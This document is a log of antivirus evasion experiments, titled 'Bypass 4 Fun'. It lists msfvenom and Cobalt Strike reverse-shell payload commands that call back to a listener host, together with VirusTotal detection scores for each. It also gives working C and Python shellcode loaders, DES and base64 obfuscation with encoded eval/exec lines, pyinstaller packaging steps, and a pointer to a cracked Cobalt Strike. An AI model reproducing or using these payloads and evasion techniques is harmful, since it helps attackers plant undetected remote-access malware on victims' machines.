Log of Anti-AntiVirus

Bypass 4 Fun

Payloads VirusTotal Remark
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=9876 -f exe > Bufferfly.exe 53/69
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 16 LHOST=192.168.56.103 LPORT=9876 -f exe > Bufferfly.exe 52/69
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=9876 -f c > Bufferfly.c 20/69 Visual Studio编译生成32位可执行程序
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 16 LHOST=192.168.56.103 LPORT=9876 -f c > Bufferfly.c 13/69 Visual Studio编译生成32位可执行程序
msfvenom -p windows/x64/meterpreter/reverse_tcp -e LHOST=192.168.56.103 LPORT=9876 -f py > Bufferfly.py 23/69 Payload需要与Python版本相匹配
msfvenom -p windows/x64/meterpreter/reverse_tcp -e LHOST=192.168.56.103 LPORT=9876 -f py > Bufferfly.py
DES
15/70 Payload需要与Python版本相匹配
pyinstaller -F -w -p PATH_TO_PAKEAGE shellcode.py
(Cryptodome)
msfvenom -p windows/x64/meterpreter/reverse_tcp -e LHOST=192.168.56.103 LPORT=9876 -f py > Bufferfly.py
DES BASE64
11/69 Payload需要与Python版本相匹配
pyinstaller -F -w -p PATH_TO_PAKEAGE shellcode.py
(Cryptodome)
CobaltStrike
windows/beacon_http/reverse_http
x86 EXE
50/67
CobaltStrike
windows/beacon_http/reverse_http
x86 C
27/70 Visual Studio编译生成32位可执行程序
CobaltStrike
windows/beacon_http/reverse_http
x64 Python
23/68 Payload需要与Python版本相匹配
CobaltStrike
windows/beacon_http/reverse_http
x64 Python DES BASE64
10/68 Payload需要与Python版本相匹配
pyinstaller -F -w -p PATH_TO_PAKEAGE shellcode.py
(Cryptodome)
1
2
3
4
5
6
7
8
9
10
#include <stdio.h>
#include <Windows.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char buf[] = "shellcode";
main()
{
LPVOID shellcode = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(shellcode, buf, sizeof(buf));
((void(*)())shellcode)();
}
1
2
3
4
5
6
7
8
9
import ctypes
buf = b"shellcode"
shellcode = bytearray(buf)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#encrypt.py
from Cryptodome.Cipher import DES
import base64
buf = b"shellcode"
key = b'DEADC0DE'
des = DES.new(key, DES.MODE_ECB)
pad = (8 - len(buf) % 8) * b"\x00"
b64code = base64.b64encode(des.encrypt(buf + pad))
print(b64code)
print(len(buf))
#---------------------------
#shellcode.py
from Cryptodome.Cipher import DES
import base64
import ctypes
b64code = b"base64code"
length = 510
key = b"DEADC0DE"
des = DES.new(key, DES.MODE_ECB)
buf = des.decrypt(base64.b64decode(b64code))[:length]
shellcode = bytearray(buf)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
#eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
#exec(base64.b64decode("aGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoY3R5cGVzLmNfaW50KDApLGN0eXBlcy5jX2ludCgwKSxjdHlwZXMuY191aW50NjQocHRyKSxjdHlwZXMuY19pbnQoMCksY3R5cGVzLmNfaW50KDApLGN0eXBlcy5wb2ludGVyKGN0eXBlcy5jX2ludCgwKSkp"))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

[Python]執行pyinstaller產生的執行檔出現No module錯誤訊息
python3 shellcode 使用eval函数 bypass AV
对于python中eval函数不能执行赋值操作的解决方法
实验使用 C 编译 shellcode 免杀上线
python3的Cryptodome
Cobalt Strike系列教程第一章:简介与安装
CS teamserver.bat
Cobalt Strike 4.3破解版